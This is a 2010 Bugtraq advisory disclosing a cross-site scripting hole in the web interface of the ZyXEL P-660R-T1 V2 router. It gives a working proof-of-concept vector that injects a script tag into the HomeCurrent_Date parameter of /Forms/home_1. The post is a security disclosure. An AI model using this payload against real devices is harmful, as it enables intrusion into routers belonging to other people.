[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
ZyXEL P-660R-T1 V2 XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ZyXEL P-660R-T1 V2 XSS
- From: Usman Saeed <usman@xxxxxxxxx>
- Date: Tue, 23 Nov 2010 17:32:03 +0500
#####################################################################################
#
# Name : ZyXEL P-660R-T1 V2 XSS
# Author : Usman Saeed from Xc0re Security Research Group
# Homepage :http://www.xc0re.net
# Dated : 22/11/2010
#
#####################################################################################
Exploit:
VECTOR
:http://IP/Forms/home_1?&HomeCurrent_Date='<sCript>alert(1);</ScRiPt>'01%2F01%2F2000
This works with the post request ! As by default this value is sent through
POST request.